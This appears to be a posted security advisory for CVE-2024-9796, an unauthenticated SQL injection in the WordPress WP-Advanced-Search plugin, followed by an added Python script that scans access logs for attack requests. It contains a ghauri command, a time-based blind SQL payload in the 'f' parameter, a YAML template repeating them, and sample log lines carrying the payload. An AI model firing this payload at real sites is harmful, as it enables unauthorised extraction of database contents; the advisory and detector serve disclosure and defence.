CVE-2024-9796 vulnerability
Posted on 2025-8-6 12:56:57 (poster's user group: Administrator)
WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection Vulnerability

Description
The WP-Advanced-Search plugin for WordPress, in all versions up to and including 3.3.9, is vulnerable to SQL injection. The vulnerability exists because user-supplied parameters are insufficiently escaped and the SQL query is not prepared. As a result, an unauthenticated attacker can append additional SQL queries to the existing query and potentially extract sensitive information from the database.
Vulnerability details
  • Type: plugin
  • CVSS score: 7.5 (High)
  • CVE: CVE-2024-9796
  • Plugin slug: wp-advanced-search
Download link
Proof of concept (PoC)
Example of exploiting the SQL injection vulnerability via the autocompletion-PHP5.5.php endpoint:
ghauri -u "https://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=19692269759899"

Payload example
The following payload demonstrates time-based blind SQL injection using the vulnerable parameter f:
Parameter: f (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (IF - comment)
Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=13672261755853

id: CVE-2024-9796

info:
  name: "WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection"
  author: "Issam Junior"
  severity: "critical"
  metadata:
    verified: true
    max-request: 2
  tags: "github.com/fa-rrel ==> WHAT DO YOU THINK ABOUT ME ?"

variables:
  cve: "CVE-2024-9796"
  plugin_name: "wp-advanced-search"
  plugin_version: "3.3.9"
  type: "plugin"
  description: |
    The WordPress WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9.
    This vulnerability is caused by insufficient escaping on user-supplied parameters and a lack of proper preparation of the existing SQL query.
    This makes it possible for unauthenticated attackers to append arbitrary SQL queries to existing queries, potentially leading to the
    extraction of sensitive information from the database.
  download_link: "https://downloads.wordpress.org/plugin/wp-advanced-search.3.3.9.zip"
  cvss_score: 7.5

poc:
  - "ghauri -u \"https://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=19692269759899\""
  - "Parameter: f (GET)"
  - "Type: time-based blind"
  - "Title: MySQL >= 5.0.12 time-based blind (IF - comment)"
  - "Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=13672261755853'"
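As an added example from the defender's side (not part of the original post, the advisory, or the plugin), the following Python check scans web-server access logs for requests to the autocompletion endpoint named above whose f parameter has the shape of the quoted payload. The log lines are constructed, and the rule that legitimate f values are bare identifiers (the PoC's benign request sends f=words) is an assumption of mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter taken from the advisory's PoC request.
VULN_ENDPOINT = ("/wp-content/plugins/wp-advanced-search/"
                 "class.inc/autocompletion/autocompletion-PHP5.5.php")
VULN_PARAM = "f"
# The benign PoC request sends f=words, so anything that is not a bare identifier is
# treated as suspicious (my assumption about legitimate values, not an advisory claim).
IDENTIFIER = re.compile(r"^[A-Za-z0-9_]+$")
# Timing functions that characterise time-based blind probing, as in the quoted payload.
TIMING_FUNCS = re.compile(r"\b(sleep|benchmark|sysdate)\s*\(", re.I)
# Combined-format request line; the target is matched lazily so an unencoded space in
# the query string does not truncate it.
REQUEST_LINE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (.+?) HTTP/\d\.\d" (\d{3})')

def inspect_line(line):
    """Return an alert dict for one access-log line, or None when nothing is suspicious."""
    m = REQUEST_LINE.match(line)
    if not m:
        return None
    client, when, _method, target, status = m.groups()
    url = urlsplit(target)
    if url.path != VULN_ENDPOINT:
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values once
    value = params.get(VULN_PARAM, [""])[0]
    reasons = []
    if not IDENTIFIER.match(value):
        reasons.append("f is not a bare identifier")
    if TIMING_FUNCS.search(value):
        reasons.append("timing function in f (time-based blind SQLi)")
    if not reasons:
        return None
    return {"client": client, "time": when, "status": status, "f": value, "reasons": reasons}

def scan_log(text):
    """Run inspect_line over every line of a log file's contents."""
    return [alert for alert in map(inspect_line, text.splitlines()) if alert]

# Constructed sample log lines (not real traffic): a benign request, one shaped like the
# advisory's payload, and an unrelated request that must not be reported.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Aug/2025:12:56:57 +0800] "GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&q=c HTTP/1.1" 200 512
203.0.113.9 - - [06/Aug/2025:12:57:03 +0800] "GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=if(now()%3Dsysdate()%2CSLEEP(9)%2C0)--%20wXyW&l=5&q=c HTTP/1.1" 200 12
203.0.113.9 - - [06/Aug/2025:12:57:10 +0800] "GET /index.php?s=SLEEP(5) HTTP/1.1" 200 3000
"""
```

Run it over a real file with scan_log(open(path).read()); only one layer of percent-encoding is decoded, so normalise double-encoded input before feeding it in.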